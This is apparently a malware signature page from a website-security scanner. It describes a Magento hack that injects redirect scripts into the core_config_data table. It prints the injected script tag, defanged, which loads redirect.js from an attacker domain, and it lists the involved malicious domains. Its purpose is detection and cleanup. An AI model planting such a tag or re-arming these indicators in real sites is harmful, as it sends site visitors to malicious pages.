SiteCheck Signatures

  1. Home
  2. SiteCheck Signatures
  3. malware.magento_redirect.1


Description: Magneto-specific hacks that injects redirect scripts into web pages.

The scripts can be recognized by the /redirect_base/redirect.js path and id of 1371499155545

<script src="hxxps://ribinski[.]us/redirect_base/redirect.js" id="1371499155545"></script>

Domains involved: florentbodart[.]us, ribinski[.]us, africangirl[.]top, africangrey[.]top

The scripts are typically injected into the core_config_data table. For example in the design/head/includes section.

Affecting: Magento

Mitigation How to clean a hacked Magento site